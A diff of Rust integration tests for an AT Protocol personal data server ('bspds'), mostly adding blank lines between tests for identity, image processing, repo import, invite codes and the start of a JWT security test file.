···
1
use chrono::Utc;
2
use reqwest::StatusCode;
3
use serde_json::{Value, json};
4
+
5
pub use crate::common::*;
6
+
7
#[allow(dead_code)]
8
pub async fn setup_new_user(handle_prefix: &str) -> (String, String) {
9
let client = client();
···
42
let new_jwt = verify_new_account(&client, &new_did).await;
43
(new_did, new_jwt)
44
}
45
+
46
#[allow(dead_code)]
47
pub async fn create_post(
48
client: &reqwest::Client,
···
86
let cid = create_body["cid"].as_str().unwrap().to_string();
87
(uri, cid)
88
}
89
+
90
#[allow(dead_code)]
91
pub async fn create_follow(
92
client: &reqwest::Client,
···
130
let cid = create_body["cid"].as_str().unwrap().to_string();
131
(uri, cid)
132
}
133
+
134
#[allow(dead_code)]
135
pub async fn create_like(
136
client: &reqwest::Client,
···
172
body["cid"].as_str().unwrap().to_string(),
173
)
174
}
175
+
176
#[allow(dead_code)]
177
pub async fn create_repost(
178
client: &reqwest::Client,
+9
tests/identity.rs
+9
tests/identity.rs
···
4
use serde_json::{Value, json};
5
use wiremock::matchers::{method, path};
6
use wiremock::{Mock, MockServer, ResponseTemplate};
7
#[tokio::test]
8
async fn test_resolve_handle_success() {
9
let client = client();
···
39
let body: Value = res.json().await.expect("Response was not valid JSON");
40
assert_eq!(body["did"], did);
41
}
42
#[tokio::test]
43
async fn test_resolve_handle_not_found() {
44
let client = client();
···
56
let body: Value = res.json().await.expect("Response was not valid JSON");
57
assert_eq!(body["error"], "HandleNotFound");
58
}
59
#[tokio::test]
60
async fn test_resolve_handle_missing_param() {
61
let client = client();
···
69
.expect("Failed to send request");
70
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
71
}
72
#[tokio::test]
73
async fn test_well_known_did() {
74
let client = client();
···
82
assert!(body["id"].as_str().unwrap().starts_with("did:web:"));
83
assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer");
84
}
85
#[tokio::test]
86
async fn test_create_did_web_account_and_resolve() {
87
let client = client();
···
145
assert_eq!(doc["verificationMethod"][0]["controller"], did);
146
assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object());
147
}
148
#[tokio::test]
149
async fn test_create_account_duplicate_handle() {
150
let client = client();
···
178
let body: Value = res.json().await.expect("Response was not JSON");
179
assert_eq!(body["error"], "HandleTaken");
180
}
181
#[tokio::test]
182
async fn test_did_web_lifecycle() {
183
let client = client();
···
267
assert_eq!(record_body["value"]["displayName"], "DID Web User");
268
*/
269
}
270
#[tokio::test]
271
async fn test_get_recommended_did_credentials_success() {
272
let client = client();
···
296
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
297
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
298
}
299
#[tokio::test]
300
async fn test_get_recommended_did_credentials_no_auth() {
301
let client = client();
···
4
use serde_json::{Value, json};
5
use wiremock::matchers::{method, path};
6
use wiremock::{Mock, MockServer, ResponseTemplate};
7
+
8
#[tokio::test]
9
async fn test_resolve_handle_success() {
10
let client = client();
···
40
let body: Value = res.json().await.expect("Response was not valid JSON");
41
assert_eq!(body["did"], did);
42
}
43
+
44
#[tokio::test]
45
async fn test_resolve_handle_not_found() {
46
let client = client();
···
58
let body: Value = res.json().await.expect("Response was not valid JSON");
59
assert_eq!(body["error"], "HandleNotFound");
60
}
61
+
62
#[tokio::test]
63
async fn test_resolve_handle_missing_param() {
64
let client = client();
···
72
.expect("Failed to send request");
73
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
74
}
75
+
76
#[tokio::test]
77
async fn test_well_known_did() {
78
let client = client();
···
86
assert!(body["id"].as_str().unwrap().starts_with("did:web:"));
87
assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer");
88
}
89
+
90
#[tokio::test]
91
async fn test_create_did_web_account_and_resolve() {
92
let client = client();
···
150
assert_eq!(doc["verificationMethod"][0]["controller"], did);
151
assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object());
152
}
153
+
154
#[tokio::test]
155
async fn test_create_account_duplicate_handle() {
156
let client = client();
···
184
let body: Value = res.json().await.expect("Response was not JSON");
185
assert_eq!(body["error"], "HandleTaken");
186
}
187
+
188
#[tokio::test]
189
async fn test_did_web_lifecycle() {
190
let client = client();
···
274
assert_eq!(record_body["value"]["displayName"], "DID Web User");
275
*/
276
}
277
+
278
#[tokio::test]
279
async fn test_get_recommended_did_credentials_success() {
280
let client = client();
···
304
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
305
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
306
}
307
+
308
#[tokio::test]
309
async fn test_get_recommended_did_credentials_no_auth() {
310
let client = client();
+31
tests/image_processing.rs
+31
tests/image_processing.rs
···
1
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
use image::{DynamicImage, ImageFormat};
3
use std::io::Cursor;
4
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
5
let img = DynamicImage::new_rgb8(width, height);
6
let mut buf = Vec::new();
7
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
8
buf
9
}
10
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
11
let img = DynamicImage::new_rgb8(width, height);
12
let mut buf = Vec::new();
13
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
14
buf
15
}
16
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
17
let img = DynamicImage::new_rgb8(width, height);
18
let mut buf = Vec::new();
19
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
20
buf
21
}
22
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
23
let img = DynamicImage::new_rgb8(width, height);
24
let mut buf = Vec::new();
25
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
26
buf
27
}
28
#[test]
29
fn test_process_png() {
30
let processor = ImageProcessor::new();
···
33
assert_eq!(result.original.width, 500);
34
assert_eq!(result.original.height, 500);
35
}
36
#[test]
37
fn test_process_jpeg() {
38
let processor = ImageProcessor::new();
···
41
assert_eq!(result.original.width, 400);
42
assert_eq!(result.original.height, 300);
43
}
44
#[test]
45
fn test_process_gif() {
46
let processor = ImageProcessor::new();
···
49
assert_eq!(result.original.width, 200);
50
assert_eq!(result.original.height, 200);
51
}
52
#[test]
53
fn test_process_webp() {
54
let processor = ImageProcessor::new();
···
57
assert_eq!(result.original.width, 300);
58
assert_eq!(result.original.height, 200);
59
}
60
#[test]
61
fn test_thumbnail_feed_size() {
62
let processor = ImageProcessor::new();
···
66
assert!(thumb.width <= THUMB_SIZE_FEED);
67
assert!(thumb.height <= THUMB_SIZE_FEED);
68
}
69
#[test]
70
fn test_thumbnail_full_size() {
71
let processor = ImageProcessor::new();
···
75
assert!(thumb.width <= THUMB_SIZE_FULL);
76
assert!(thumb.height <= THUMB_SIZE_FULL);
77
}
78
#[test]
79
fn test_no_thumbnail_small_image() {
80
let processor = ImageProcessor::new();
···
83
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
84
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
85
}
86
#[test]
87
fn test_webp_conversion() {
88
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
90
let result = processor.process(&data, "image/png").unwrap();
91
assert_eq!(result.original.mime_type, "image/webp");
92
}
93
#[test]
94
fn test_jpeg_output_format() {
95
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
···
97
let result = processor.process(&data, "image/png").unwrap();
98
assert_eq!(result.original.mime_type, "image/jpeg");
99
}
100
#[test]
101
fn test_png_output_format() {
102
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
···
104
let result = processor.process(&data, "image/jpeg").unwrap();
105
assert_eq!(result.original.mime_type, "image/png");
106
}
107
#[test]
108
fn test_max_dimension_enforced() {
109
let processor = ImageProcessor::new().with_max_dimension(1000);
···
116
assert_eq!(max_dimension, 1000);
117
}
118
}
119
#[test]
120
fn test_file_size_limit() {
121
let processor = ImageProcessor::new().with_max_file_size(100);
···
127
assert_eq!(max_size, 100);
128
}
129
}
130
#[test]
131
fn test_default_max_file_size() {
132
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
133
}
134
#[test]
135
fn test_unsupported_format_rejected() {
136
let processor = ImageProcessor::new();
···
138
let result = processor.process(data, "application/octet-stream");
139
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
140
}
141
#[test]
142
fn test_corrupted_image_handling() {
143
let processor = ImageProcessor::new();
···
145
let result = processor.process(data, "image/png");
146
assert!(matches!(result, Err(ImageError::DecodeError(_))));
147
}
148
#[test]
149
fn test_aspect_ratio_preserved_landscape() {
150
let processor = ImageProcessor::new();
···
155
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
156
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
157
}
158
#[test]
159
fn test_aspect_ratio_preserved_portrait() {
160
let processor = ImageProcessor::new();
···
165
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
166
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
167
}
168
#[test]
169
fn test_mime_type_detection_auto() {
170
let processor = ImageProcessor::new();
···
172
let result = processor.process(&data, "application/octet-stream");
173
assert!(result.is_ok(), "Should detect PNG format from data");
174
}
175
#[test]
176
fn test_is_supported_mime_type() {
177
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
186
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
187
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
188
}
189
#[test]
190
fn test_strip_exif() {
191
let data = create_test_jpeg(100, 100);
···
194
let stripped = result.unwrap();
195
assert!(!stripped.is_empty());
196
}
197
#[test]
198
fn test_with_thumbnails_disabled() {
199
let processor = ImageProcessor::new().with_thumbnails(false);
···
202
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
203
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
204
}
205
#[test]
206
fn test_builder_chaining() {
207
let processor = ImageProcessor::new()
···
213
let result = processor.process(&data, "image/png").unwrap();
214
assert_eq!(result.original.mime_type, "image/jpeg");
215
}
216
#[test]
217
fn test_processed_image_fields() {
218
let processor = ImageProcessor::new();
···
223
assert!(result.original.width > 0);
224
assert!(result.original.height > 0);
225
}
226
#[test]
227
fn test_only_feed_thumbnail_for_medium_images() {
228
let processor = ImageProcessor::new();
···
231
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
232
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
233
}
234
#[test]
235
fn test_both_thumbnails_for_large_images() {
236
let processor = ImageProcessor::new();
···
239
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
240
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
241
}
242
#[test]
243
fn test_exact_threshold_boundary_feed() {
244
let processor = ImageProcessor::new();
···
249
let result = processor.process(&above_threshold, "image/png").unwrap();
250
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
251
}
252
#[test]
253
fn test_exact_threshold_boundary_full() {
254
let processor = ImageProcessor::new();
···
1
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
use image::{DynamicImage, ImageFormat};
3
use std::io::Cursor;
4
+
5
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
6
let img = DynamicImage::new_rgb8(width, height);
7
let mut buf = Vec::new();
8
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
9
buf
10
}
11
+
12
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
13
let img = DynamicImage::new_rgb8(width, height);
14
let mut buf = Vec::new();
15
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
16
buf
17
}
18
+
19
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
20
let img = DynamicImage::new_rgb8(width, height);
21
let mut buf = Vec::new();
22
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
23
buf
24
}
25
+
26
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
27
let img = DynamicImage::new_rgb8(width, height);
28
let mut buf = Vec::new();
29
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
30
buf
31
}
32
+
33
#[test]
34
fn test_process_png() {
35
let processor = ImageProcessor::new();
···
38
assert_eq!(result.original.width, 500);
39
assert_eq!(result.original.height, 500);
40
}
41
+
42
#[test]
43
fn test_process_jpeg() {
44
let processor = ImageProcessor::new();
···
47
assert_eq!(result.original.width, 400);
48
assert_eq!(result.original.height, 300);
49
}
50
+
51
#[test]
52
fn test_process_gif() {
53
let processor = ImageProcessor::new();
···
56
assert_eq!(result.original.width, 200);
57
assert_eq!(result.original.height, 200);
58
}
59
+
60
#[test]
61
fn test_process_webp() {
62
let processor = ImageProcessor::new();
···
65
assert_eq!(result.original.width, 300);
66
assert_eq!(result.original.height, 200);
67
}
68
+
69
#[test]
70
fn test_thumbnail_feed_size() {
71
let processor = ImageProcessor::new();
···
75
assert!(thumb.width <= THUMB_SIZE_FEED);
76
assert!(thumb.height <= THUMB_SIZE_FEED);
77
}
78
+
79
#[test]
80
fn test_thumbnail_full_size() {
81
let processor = ImageProcessor::new();
···
85
assert!(thumb.width <= THUMB_SIZE_FULL);
86
assert!(thumb.height <= THUMB_SIZE_FULL);
87
}
88
+
89
#[test]
90
fn test_no_thumbnail_small_image() {
91
let processor = ImageProcessor::new();
···
94
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
95
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
96
}
97
+
98
#[test]
99
fn test_webp_conversion() {
100
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
102
let result = processor.process(&data, "image/png").unwrap();
103
assert_eq!(result.original.mime_type, "image/webp");
104
}
105
+
106
#[test]
107
fn test_jpeg_output_format() {
108
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
···
110
let result = processor.process(&data, "image/png").unwrap();
111
assert_eq!(result.original.mime_type, "image/jpeg");
112
}
113
+
114
#[test]
115
fn test_png_output_format() {
116
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
···
118
let result = processor.process(&data, "image/jpeg").unwrap();
119
assert_eq!(result.original.mime_type, "image/png");
120
}
121
+
122
#[test]
123
fn test_max_dimension_enforced() {
124
let processor = ImageProcessor::new().with_max_dimension(1000);
···
131
assert_eq!(max_dimension, 1000);
132
}
133
}
134
+
135
#[test]
136
fn test_file_size_limit() {
137
let processor = ImageProcessor::new().with_max_file_size(100);
···
143
assert_eq!(max_size, 100);
144
}
145
}
146
+
147
#[test]
148
fn test_default_max_file_size() {
149
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
150
}
151
+
152
#[test]
153
fn test_unsupported_format_rejected() {
154
let processor = ImageProcessor::new();
···
156
let result = processor.process(data, "application/octet-stream");
157
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
158
}
159
+
160
#[test]
161
fn test_corrupted_image_handling() {
162
let processor = ImageProcessor::new();
···
164
let result = processor.process(data, "image/png");
165
assert!(matches!(result, Err(ImageError::DecodeError(_))));
166
}
167
+
168
#[test]
169
fn test_aspect_ratio_preserved_landscape() {
170
let processor = ImageProcessor::new();
···
175
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
176
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
177
}
178
+
179
#[test]
180
fn test_aspect_ratio_preserved_portrait() {
181
let processor = ImageProcessor::new();
···
186
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
187
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
188
}
189
+
190
#[test]
191
fn test_mime_type_detection_auto() {
192
let processor = ImageProcessor::new();
···
194
let result = processor.process(&data, "application/octet-stream");
195
assert!(result.is_ok(), "Should detect PNG format from data");
196
}
197
+
198
#[test]
199
fn test_is_supported_mime_type() {
200
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
209
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
210
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
211
}
212
+
213
#[test]
214
fn test_strip_exif() {
215
let data = create_test_jpeg(100, 100);
···
218
let stripped = result.unwrap();
219
assert!(!stripped.is_empty());
220
}
221
+
222
#[test]
223
fn test_with_thumbnails_disabled() {
224
let processor = ImageProcessor::new().with_thumbnails(false);
···
227
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
228
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
229
}
230
+
231
#[test]
232
fn test_builder_chaining() {
233
let processor = ImageProcessor::new()
···
239
let result = processor.process(&data, "image/png").unwrap();
240
assert_eq!(result.original.mime_type, "image/jpeg");
241
}
242
+
243
#[test]
244
fn test_processed_image_fields() {
245
let processor = ImageProcessor::new();
···
250
assert!(result.original.width > 0);
251
assert!(result.original.height > 0);
252
}
253
+
254
#[test]
255
fn test_only_feed_thumbnail_for_medium_images() {
256
let processor = ImageProcessor::new();
···
259
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
260
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
261
}
262
+
263
#[test]
264
fn test_both_thumbnails_for_large_images() {
265
let processor = ImageProcessor::new();
···
268
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
269
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
270
}
271
+
272
#[test]
273
fn test_exact_threshold_boundary_feed() {
274
let processor = ImageProcessor::new();
···
279
let result = processor.process(&above_threshold, "image/png").unwrap();
280
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
281
}
282
+
283
#[test]
284
fn test_exact_threshold_boundary_full() {
285
let processor = ImageProcessor::new();
+11
tests/import_verification.rs
+11
tests/import_verification.rs
···
3
use iroh_car::CarHeader;
4
use reqwest::StatusCode;
5
use serde_json::json;
6
#[tokio::test]
7
async fn test_import_repo_requires_auth() {
8
let client = client();
···
15
.expect("Request failed");
16
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
17
}
18
#[tokio::test]
19
async fn test_import_repo_invalid_car() {
20
let client = client();
···
31
let body: serde_json::Value = res.json().await.unwrap();
32
assert_eq!(body["error"], "InvalidRequest");
33
}
34
#[tokio::test]
35
async fn test_import_repo_empty_body() {
36
let client = client();
···
45
.expect("Request failed");
46
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
47
}
48
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
49
loop {
50
let mut byte = (value & 0x7F) as u8;
···
58
}
59
}
60
}
61
#[tokio::test]
62
async fn test_import_rejects_car_for_different_user() {
63
let client = client();
···
90
body
91
);
92
}
93
#[tokio::test]
94
async fn test_import_accepts_own_exported_repo() {
95
let client = client();
···
135
.expect("Failed to import repo");
136
assert_eq!(import_res.status(), StatusCode::OK);
137
}
138
#[tokio::test]
139
async fn test_import_repo_size_limit() {
140
let client = client();
···
165
}
166
}
167
}
168
#[tokio::test]
169
async fn test_import_deactivated_account_rejected() {
170
let client = client();
···
205
import_res.status()
206
);
207
}
208
#[tokio::test]
209
async fn test_import_invalid_car_structure() {
210
let client = client();
···
220
.expect("Request failed");
221
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
222
}
223
#[tokio::test]
224
async fn test_import_car_with_no_roots() {
225
let client = client();
···
241
let body: serde_json::Value = res.json().await.unwrap();
242
assert_eq!(body["error"], "InvalidRequest");
243
}
244
#[tokio::test]
245
async fn test_import_preserves_records_after_reimport() {
246
let client = client();
···
3
use iroh_car::CarHeader;
4
use reqwest::StatusCode;
5
use serde_json::json;
6
+
7
#[tokio::test]
8
async fn test_import_repo_requires_auth() {
9
let client = client();
···
16
.expect("Request failed");
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
}
19
+
20
#[tokio::test]
21
async fn test_import_repo_invalid_car() {
22
let client = client();
···
33
let body: serde_json::Value = res.json().await.unwrap();
34
assert_eq!(body["error"], "InvalidRequest");
35
}
36
+
37
#[tokio::test]
38
async fn test_import_repo_empty_body() {
39
let client = client();
···
48
.expect("Request failed");
49
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
50
}
51
+
52
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
53
loop {
54
let mut byte = (value & 0x7F) as u8;
···
62
}
63
}
64
}
65
+
66
#[tokio::test]
67
async fn test_import_rejects_car_for_different_user() {
68
let client = client();
···
95
body
96
);
97
}
98
+
99
#[tokio::test]
100
async fn test_import_accepts_own_exported_repo() {
101
let client = client();
···
141
.expect("Failed to import repo");
142
assert_eq!(import_res.status(), StatusCode::OK);
143
}
144
+
145
#[tokio::test]
146
async fn test_import_repo_size_limit() {
147
let client = client();
···
172
}
173
}
174
}
175
+
176
#[tokio::test]
177
async fn test_import_deactivated_account_rejected() {
178
let client = client();
···
213
import_res.status()
214
);
215
}
216
+
217
#[tokio::test]
218
async fn test_import_invalid_car_structure() {
219
let client = client();
···
229
.expect("Request failed");
230
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
231
}
232
+
233
#[tokio::test]
234
async fn test_import_car_with_no_roots() {
235
let client = client();
···
251
let body: serde_json::Value = res.json().await.unwrap();
252
assert_eq!(body["error"], "InvalidRequest");
253
}
254
+
255
#[tokio::test]
256
async fn test_import_preserves_records_after_reimport() {
257
let client = client();
+8
tests/import_with_verification.rs
+8
tests/import_with_verification.rs
···
11
use std::collections::BTreeMap;
12
use wiremock::matchers::{method, path};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
fn make_cid(data: &[u8]) -> Cid {
15
let mut hasher = Sha256::new();
16
hasher.update(data);
···
18
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
19
Cid::new_v1(0x71, multihash)
20
}
21
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
22
loop {
23
let mut byte = (value & 0x7F) as u8;
···
31
}
32
}
33
}
34
fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> {
35
let cid_bytes = cid.to_bytes();
36
let mut result = Vec::new();
···
39
result.extend_from_slice(data);
40
result
41
}
42
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
43
let public_key = signing_key.verifying_key();
44
let compressed = public_key.to_sec1_bytes();
···
55
buf.extend_from_slice(&compressed);
56
multibase::encode(multibase::Base::Base58Btc, buf)
57
}
58
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
59
let multikey = get_multikey_from_signing_key(signing_key);
60
json!({
···
77
}]
78
})
79
}
80
fn create_signed_commit(
81
did: &str,
82
data_cid: &Cid,
···
106
let cid = make_cid(&signed_bytes);
107
(signed_bytes, cid)
108
}
109
fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) {
110
let ipld_entries: Vec<Ipld> = entries
111
.into_iter()
···
124
let cid = make_cid(&bytes);
125
(bytes, cid)
126
}
127
fn create_record() -> (Vec<u8>, Cid) {
128
let record = Ipld::Map(BTreeMap::from([
129
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
···
11
use std::collections::BTreeMap;
12
use wiremock::matchers::{method, path};
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
+
15
fn make_cid(data: &[u8]) -> Cid {
16
let mut hasher = Sha256::new();
17
hasher.update(data);
···
19
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
20
Cid::new_v1(0x71, multihash)
21
}
22
+
23
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
24
loop {
25
let mut byte = (value & 0x7F) as u8;
···
33
}
34
}
35
}
36
+
37
fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> {
38
let cid_bytes = cid.to_bytes();
39
let mut result = Vec::new();
···
42
result.extend_from_slice(data);
43
result
44
}
45
+
46
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
47
let public_key = signing_key.verifying_key();
48
let compressed = public_key.to_sec1_bytes();
···
59
buf.extend_from_slice(&compressed);
60
multibase::encode(multibase::Base::Base58Btc, buf)
61
}
62
+
63
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
64
let multikey = get_multikey_from_signing_key(signing_key);
65
json!({
···
82
}]
83
})
84
}
85
+
86
fn create_signed_commit(
87
did: &str,
88
data_cid: &Cid,
···
112
let cid = make_cid(&signed_bytes);
113
(signed_bytes, cid)
114
}
115
+
116
fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) {
117
let ipld_entries: Vec<Ipld> = entries
118
.into_iter()
···
131
let cid = make_cid(&bytes);
132
(bytes, cid)
133
}
134
+
135
fn create_record() -> (Vec<u8>, Cid) {
136
let record = Ipld::Map(BTreeMap::from([
137
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
+10
tests/invite.rs
···
2
use common::*;
3
use reqwest::StatusCode;
4
use serde_json::{Value, json};
5
#[tokio::test]
6
async fn test_create_invite_code_success() {
7
let client = client();
···
26
assert!(!code.is_empty());
27
assert!(code.contains('-'), "Code should be a UUID format");
28
}
29
#[tokio::test]
30
async fn test_create_invite_code_no_auth() {
31
let client = client();
···
45
let body: Value = res.json().await.expect("Response was not valid JSON");
46
assert_eq!(body["error"], "AuthenticationRequired");
47
}
48
#[tokio::test]
49
async fn test_create_invite_code_invalid_use_count() {
50
let client = client();
···
66
let body: Value = res.json().await.expect("Response was not valid JSON");
67
assert_eq!(body["error"], "InvalidRequest");
68
}
69
#[tokio::test]
70
async fn test_create_invite_code_for_another_account() {
71
let client = client();
···
89
let body: Value = res.json().await.expect("Response was not valid JSON");
90
assert!(body["code"].is_string());
91
}
92
#[tokio::test]
93
async fn test_create_invite_codes_success() {
94
let client = client();
···
114
assert_eq!(codes.len(), 1);
115
assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3);
116
}
117
#[tokio::test]
118
async fn test_create_invite_codes_for_multiple_accounts() {
119
let client = client();
···
143
assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2);
144
}
145
}
146
#[tokio::test]
147
async fn test_create_invite_codes_no_auth() {
148
let client = client();
···
160
.expect("Failed to send request");
161
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
162
}
163
#[tokio::test]
164
async fn test_get_account_invite_codes_success() {
165
let client = client();
···
198
assert!(code["createdAt"].is_string());
199
assert!(code["uses"].is_array());
200
}
201
#[tokio::test]
202
async fn test_get_account_invite_codes_no_auth() {
203
let client = client();
···
211
.expect("Failed to send request");
212
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
213
}
214
#[tokio::test]
215
async fn test_get_account_invite_codes_include_used_filter() {
216
let client = client();
···
2
use common::*;
3
use reqwest::StatusCode;
4
use serde_json::{Value, json};
5
+
6
#[tokio::test]
7
async fn test_create_invite_code_success() {
8
let client = client();
···
27
assert!(!code.is_empty());
28
assert!(code.contains('-'), "Code should be a UUID format");
29
}
30
+
31
#[tokio::test]
32
async fn test_create_invite_code_no_auth() {
33
let client = client();
···
47
let body: Value = res.json().await.expect("Response was not valid JSON");
48
assert_eq!(body["error"], "AuthenticationRequired");
49
}
50
+
51
#[tokio::test]
52
async fn test_create_invite_code_invalid_use_count() {
53
let client = client();
···
69
let body: Value = res.json().await.expect("Response was not valid JSON");
70
assert_eq!(body["error"], "InvalidRequest");
71
}
72
+
73
#[tokio::test]
74
async fn test_create_invite_code_for_another_account() {
75
let client = client();
···
93
let body: Value = res.json().await.expect("Response was not valid JSON");
94
assert!(body["code"].is_string());
95
}
96
+
97
#[tokio::test]
98
async fn test_create_invite_codes_success() {
99
let client = client();
···
119
assert_eq!(codes.len(), 1);
120
assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3);
121
}
122
+
123
#[tokio::test]
124
async fn test_create_invite_codes_for_multiple_accounts() {
125
let client = client();
···
149
assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2);
150
}
151
}
152
+
153
#[tokio::test]
154
async fn test_create_invite_codes_no_auth() {
155
let client = client();
···
167
.expect("Failed to send request");
168
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
169
}
170
+
171
#[tokio::test]
172
async fn test_get_account_invite_codes_success() {
173
let client = client();
···
206
assert!(code["createdAt"].is_string());
207
assert!(code["uses"].is_array());
208
}
209
+
210
#[tokio::test]
211
async fn test_get_account_invite_codes_no_auth() {
212
let client = client();
···
220
.expect("Failed to send request");
221
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
222
}
223
+
224
#[tokio::test]
225
async fn test_get_account_invite_codes_include_used_filter() {
226
let client = client();
+43
tests/jwt_security.rs
+43
tests/jwt_security.rs
···
15
use reqwest::StatusCode;
16
use serde_json::{json, Value};
17
use sha2::{Digest, Sha256};
18
fn generate_user_key() -> Vec<u8> {
19
let secret_key = SecretKey::random(&mut OsRng);
20
secret_key.to_bytes().to_vec()
21
}
22
fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String {
23
let signing_key = SigningKey::from_slice(key_bytes).expect("valid key");
24
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
···
28
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
29
format!("{}.{}", message, signature_b64)
30
}
31
fn create_unsigned_jwt(header: &Value, claims: &Value) -> String {
32
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
33
